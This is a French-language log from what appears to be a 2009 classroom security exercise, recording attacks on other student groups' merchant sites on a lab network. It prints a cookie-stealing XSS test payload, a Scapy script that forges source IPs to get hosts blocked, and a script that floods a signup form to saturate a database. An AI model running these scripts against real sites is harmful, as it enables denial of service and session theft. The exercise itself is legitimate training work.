Attaques réalisées

Lundi 02 Février 2009

Tests des sites marchands

Nous avons constaté des défauts sur l'ensemble des sites marchands.
Le site marchand TLD a de loin le plus de problèmes :

  • pas de tests sur les entrées ;
  • possibilité d'exécuter du code Javascript sur le site ;

Injection de code sur TLD

<script>alert(document.cookie);</script>

Déni de service sur la boutique TLD

La boutique TLD bloque les hôtes envoyant des paquets ICMP vers ses systèmes. À l'aide du langage Python et de Scapy nous avons écrit un petit script forgeant toutes les adresses IP de la salle et envoyant des paquets ICMP à destination de TLD.

from scapy import *
 
ip_src = ['0', '0', '0', '0']
ip_src[0], ip_src[1], ip_src[2]  = '172', '16', '116'
dont_scan = [1, 3, 4, 5]
 
for i in range(1,255):
    if i not in dont_scan:
        ip_src[3] = str(i)
        sr(IP(src='.'.join(ip_src), dst="172.16.11.20")/ICMP(code=8, type=0),\
         timeout=1, retry=1)

Lundi 09 Février 2009

Script d'auto-inscription

Nous avons écrit un script Python permettant de remplir des formulaires d'inscriptions automatiquement. Ceci a pour conséquence de saturer la base de données de la cible. Au départ l'attaque était prévue pour la boutique TLD, cependant en raison de sa période d'inaccessibilité nous avons dût attaquer le site d'un autre groupe. Avec succès.

#!/usr/bin/env python
 
import urllib
import urllib2
 
#url = "https://boutique/TLD/jsp/clientAdd.jsp"
url = "https://172.16.116.6/site/ActionNewClient.do"
user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'
 
for i in range(1000000000):
    """
    values = {
        'Nom' : 'Tutu',
        'Prenom' : 'Toto',
        'TelPortable' : '0678912345',
        'TelFixe' : '0123456789',
        'Mail' : 'trouve@perdu.com',
        'Author' : 'toto' + str(i),
        'title' : 'azerty',
        'Libelle' : '123 rue des fraises',
        'CodePostal' : '13000',
        'Ville' : 'Marseille',
        'Pays' : 'France',
        'CarteBancaire' : '0123456789',
        'Mois' : '12',
        'Annee' : '2009'
    }
    """
    values = {
        'nom' : 'Tutu',
        'prenom' : 'Toto',
        'adresse' : '0678912345',
        'cp' : '12345',
        'ville' : 'Ici',
        'telephone' : '0678912345',
        'mail' : 'trouve@perdu.com',
        'login' : 'toto' + str(i),
        'mdp' : 'azerty',
        'mdp2' : 'azerty'
    }
 
    data = urllib.urlencode(values)
    headers = { 'User-Agent' : user_agent }
 
    req = urllib2.Request(url, data, headers)
    handle = urllib2.urlopen(req)
 
    print i, values['login']
Unless otherwise stated, the content of this page is licensed under Creative Commons Attribution-ShareAlike 3.0 License